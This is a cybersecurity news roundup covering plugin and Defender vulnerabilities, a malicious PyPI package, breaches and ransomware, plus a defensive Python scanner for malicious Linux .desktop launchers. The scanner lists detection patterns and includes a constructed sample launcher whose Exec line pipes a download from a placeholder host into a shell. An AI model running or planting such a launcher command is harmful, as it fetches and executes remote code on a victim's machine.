A PHP Object Injection vulnerability in Uncanny Automator, while a fake Solana PyPI package targets developers. Microsoft patched a critical Linux Defender bug, Alabama faces a cybersecurity incident, and Hong Kong’s Drug Safety Center was hit by ransomware. The EU launched a new vulnerability database, data breaches in Australia hit a five-year high, and Google Intel released guides to detect malicious files.
1. Uncanny Automator Bug Risks WordPress Sites
A critical PHP Object Injection vulnerability was discovered in the Uncanny Automator WordPress plugin, a tool active on over 50,000 websites. This security flaw could allow authenticated attackers, even those with minimal subscriber-level access, to delete vital files like wp-config.php, potentially leading to full site takeover and remote code execution. All users are strongly advised to update to the latest version immediately to protect their sites, while Wordfence customers have already started receiving firewall protection against this specific threat.
2. Devs Hit By PyPI Solana Token Secret Theft
A malicious package named “solana-token” was discovered on the Python Package Index (PyPI). Disguised as a Solana blockchain tool, it actually stole source code and developer secrets, and was downloaded 761 times before removal. The malware specifically targeted developers creating their own blockchains by attempting to exfiltrate sensitive crypto-related data. This incident underscores the persistent supply chain threats in software and urges developers to meticulously scrutinize all third-party packages.
3. Microsoft Defender Bug Allows SYSTEM Access
A security flaw, CVE-2025-26684, was discovered in Microsoft Defender for Endpoint on Linux systems. This vulnerability allowed authenticated local attackers to elevate their privileges to SYSTEM level, gaining complete control. Microsoft addressed this Important-severity flaw as part of its May 2025 Patch Tuesday updates, released on May 13th. Organizations using affected Linux versions are strongly advised to apply the security update immediately.
4. Alabama Cybersecurity Event Hits Services
Alabama is responding to a cybersecurity incident that disrupted government services and website access. Governor Kay Ivey confirmed that some employee credentials were compromised but no resident data was stolen. The Office of Information Technology is investigating with help from a third-party cybersecurity firm. Officials urged caution with emails and continue working to contain the incident’s full impact.
5. Andy Frain Data Breach Impacts 100k People
Andy Frain Services notified over 100,000 individuals about an October 2024 data breach that compromised personal information. The ransomware group Black Basta claimed responsibility for stealing 750 GB of data, though the company has not confirmed this. Experts expressed concern over the nearly seven-month delay in notifying those affected by the security incident. Andy Frain Services has not yet detailed the breach’s cause or provided specific guidance to the impacted individuals.
6. Hong Kong DSC Hit By Ransomware Attack
Hong Kong’s Drug Safety Testing Center, under HKSTP, experienced a malicious ransomware attack on its computer systems on May 12th. This security incident compromised data belonging to approximately 30 employees and 20 customers of the center. The Drug Safety Testing Center immediately isolated affected servers, activated an incident task force, and reported the breach to Hong Kong police and relevant authorities. HKSTP is fully cooperating with the police investigation and has engaged an independent cybersecurity expert for review and remediation.
7. New EU Vulnerability Database Launched
The European Union has launched its new vulnerability database, the European Union Vulnerability Database (EUVD), developed by ENISA following the NIS2 Directive. This beta launch in mid-April occurred amid uncertainty about the future operation of MITRE’s CVE Program. The EUVD will provide aggregated, actionable information on ICT vulnerabilities, including their exploitation status and mitigation measures. Meanwhile, a new CVE Foundation has emerged aiming for a nonprofit model, and CISA has affirmed its commitment to the CVE program’s stability.
8. Aussie Data Breach Reports Hit 5 Year High
Australia experienced its highest number of reported data breaches this decade in late 2024, with 527 notifications. The Office of the Australian Information Commissioner (OAIC) report revealed malicious attacks like ransomware and compromised credentials drove most incidents. Health and government sectors were prime targets, alongside rising supply chain breaches and significant human error. Concerningly, the OAIC noted over a quarter of organizations significantly delayed their mandatory breach notifications.
9. Google Hunts Malicious Linux Desktop Files
Google Threat Intelligence has launched a new blog series to share advanced threat hunting techniques with security professionals. The initial focus is on detecting malicious .desktop files on Linux systems, which attackers use to hide malicious commands. These files often employ decoy PDF documents hosted on Google Drive to distract victims while malware downloads. Google provides several query-based hunting strategies to help defenders proactively identify and combat these evolving threats.
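As an added illustration of the hunting approach described above (this is not Google Threat Intelligence’s own queries or code), the Python script below applies simple heuristics to Linux .desktop launchers: it parses the [Desktop Entry] group, inspects the Exec line for download-and-execute pipelines, inline shell commands, decoded payloads, Google Drive URLs and temp-directory paths, and flags launchers whose Name pretends to be a document while Exec does more than open one. The two sample launchers and the https://example.invalid URL are constructed for the demonstration.

```python
"""Heuristic scanner for suspicious Linux .desktop launchers.

Added example, not Google's tooling: the patterns below are illustrative
indicators a defender might start from, not a complete detection ruleset.
"""
import re
from pathlib import Path

# (regex applied to the Exec= value, human-readable reason)
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped into a shell"),
    (r"\bbase64\b.*(-d|--decode)", "base64-decoded payload"),
    (r"\b(sh|bash|zsh)\s+-c\b", "inline shell command"),
    (r"xdg-open\b.*\.pdf\b.*(;|&&|\|\|)", "decoy PDF opened before further commands"),
    (r"drive\.google\.com|docs\.google\.com/uc", "file fetched from Google Drive"),
    (r"/tmp/|/dev/shm/", "runs from or writes to a temp location"),
]

# Locations where user-level launchers typically live (assumed defaults).
DEFAULT_SCAN_DIRS = [
    Path.home() / ".config" / "autostart",
    Path.home() / ".local" / "share" / "applications",
    Path.home() / "Desktop",
]


def parse_desktop(text):
    """Parse the [Desktop Entry] group into a dict (subset of the XDG spec)."""
    entries = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def scan_desktop(text):
    """Return a list of findings (strings) for one .desktop file's content."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    findings = [reason for pattern, reason in SUSPICIOUS_PATTERNS
                if re.search(pattern, exec_line, re.IGNORECASE)]
    # A launcher named like a document should only open that document.
    name = entry.get("Name", "")
    looks_like_doc = re.search(r"\.(pdf|docx?|xlsx?)$", name, re.IGNORECASE)
    if looks_like_doc and not re.fullmatch(r"xdg-open\s+\S+", exec_line):
        findings.append("name looks like a document but Exec does more than open one")
    return findings


def scan_directories(dirs=DEFAULT_SCAN_DIRS):
    """Scan every *.desktop file under the given directories; return {path: findings}."""
    results = {}
    for directory in dirs:
        if not directory.is_dir():
            continue
        for path in directory.glob("*.desktop"):
            findings = scan_desktop(path.read_text(errors="replace"))
            if findings:
                results[str(path)] = findings
    return results


# Constructed sample launchers used for the demonstration below.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=gedit
"""

SUSPECT_DESKTOP = """[Desktop Entry]
Type=Application
Name=Invoice-2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s https://example.invalid/stage | sh"
"""

if __name__ == "__main__":
    print("benign sample:", scan_desktop(BENIGN_DESKTOP))
    print("suspect sample:", scan_desktop(SUSPECT_DESKTOP))
    for path, findings in scan_directories().items():
        print(path, "->", "; ".join(findings))
```

Run stand-alone, the script reports the constructed samples first and then any launchers in the assumed user directories; the regex list is where a team would add the indicators from its own hunting queries.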
Update Uncanny Automator Plugin Immediately
A critical vulnerability has been discovered in the Uncanny Automator WordPress plugin, used on over 50,000 sites. This flaw could allow attackers with even the lowest level of access (like subscribers) to delete sensitive files such as wp-config.php, potentially resulting in a complete site takeover and remote code execution.
Actions You Should Take:
Why it matters: Low-level user accounts can be exploited, which means even a simple subscriber could trigger the attack. If successful, attackers can delete configuration files, disabling your site or enabling further compromise.